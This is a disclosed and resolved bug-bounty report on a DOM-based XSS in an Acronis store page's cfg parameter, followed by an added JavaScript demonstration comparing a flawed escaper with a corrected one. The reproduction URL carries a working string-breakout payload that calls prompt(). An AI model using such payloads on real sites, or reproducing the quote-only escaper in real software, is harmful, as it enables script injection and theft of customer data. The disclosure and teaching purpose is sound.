DOM based XSS in store.acronis.com/<id>/purl-corporate-standard-IT [cfg parameter]

Disclosed: 2020-10-20 14:37:52 By f_m To acronis
Severity: Low
Vulnerability Details
## Summary

Hi Acronis team, I found a DOM-based XSS in store.acronis.com. This vulnerability arises from a missing escape for the `\` character.

## Steps To Reproduce

1. Go to: https://store.acronis.com/837/purl-corporate-standard-IT?cart=201591&deliveryEmail=f_m%2B5%40wearehackerone.com&deliveryFirstname=fmfm&deliveryEmailRetype=f_m%2B5%40wearehackerone.com&deliveryPhone1=fmfm&deliveryLastname=fmfmfm&x-uid=%22%3e%3ctestxss&quantity_201591=1&recommendation=cloud_20off&recommendation=ACPPLP&x-page=https://www.acronis.com/it-it/business/backup/server/purchasing/&tracking=&x-segment=corporate&cfg=\\ciao%27}];prompt();var%20asd=[{%27foo%27:%27bar
2. A prompt appears {F965980}

## Impact

Since it's in the store subdomain, this can lead to PII stealing.

## Recommendations

Escape the `\` character as `\\`.
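The root cause the report points at (a quote escaper that ignores the backslash) is easiest to see with the two escapers side by side. The following is an added example written for this page; it is not code from the report or from the store.acronis.com site. The page template `var cfg=[{'foo':'...'}];`, the function names and the probe string are assumptions made for the demonstration, and the scanner only models the `\'` and `\\` escapes that occur in it.

```javascript
// Added example (not from the report): why escaping quotes without escaping
// backslashes lets a URL parameter break out of a JavaScript string literal.

// Defective escaper: prefixes quotes with a backslash, leaves backslashes alone.
function escapeQuoteOnly(s) {
  return s.replace(/'/g, "\\'");
}

// Corrected escaper: escape the backslash FIRST, then the quote. Otherwise a
// user-supplied backslash neutralises the backslash added for the quote.
function escapeBackslashAndQuote(s) {
  return s.replace(/\\/g, "\\\\").replace(/'/g, "\\'");
}

// Hypothetical inline-script template that embeds the cfg parameter.
const PREFIX = "var cfg=[{'foo':'";   // opening quote is at PREFIX.length - 1
const SUFFIX = "'}];";

function buildScript(escaper, cfgValue) {
  return PREFIX + escaper(cfgValue) + SUFFIX;
}

// Minimal scanner for a single-quoted JS string literal whose opening quote is
// at index `start`. A backslash consumes the following character; the first
// unescaped quote terminates the literal. Returns the decoded value and the
// source text that follows the closing quote (null if unterminated).
function scanStringLiteral(src, start) {
  let value = "";
  let i = start + 1;
  while (i < src.length) {
    const c = src[i];
    if (c === "\\") {
      value += src[i + 1];   // only \' and \\ occur in this demo
      i += 2;
    } else if (c === "'") {
      return { value, rest: src.slice(i + 1) };
    } else {
      value += c;
      i += 1;
    }
  }
  return { value, rest: null };
}

// Code that the engine would execute after the literal closes. With a correct
// escaper this is exactly the template's own tail, "}];"; anything longer is
// text that came from the parameter and is now parsed as code.
function codeAfterLiteral(escaper, cfgValue) {
  const script = buildScript(escaper, cfgValue);
  return scanStringLiteral(script, PREFIX.length - 1).rest;
}

// Constructed probe in the spirit of the report: a backslash, a quote, then
// a harmless marker call and a comment to swallow the template's tail.
const PROBE = "\\'}];marker();//";

// Quote-only escaping turns \' into \\' : the literal closes early.
// Backslash-then-quote escaping turns it into \\\' : the value stays inside.
```

With `escapeQuoteOnly`, `codeAfterLiteral` returns `}];marker();//'}];`, so `marker()` would run; with `escapeBackslashAndQuote` it returns `}];` and the decoded literal equals the probe unchanged. In practice the safer options are to serialise the value with `JSON.stringify` or, better, to avoid placing URL-derived data in script context at all and read it from a data attribute or `location.search` via `textContent`-style APIs.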
Report Stats
  • Report ID: 968690
  • State: Closed
  • Substate: resolved
  • Upvotes: 17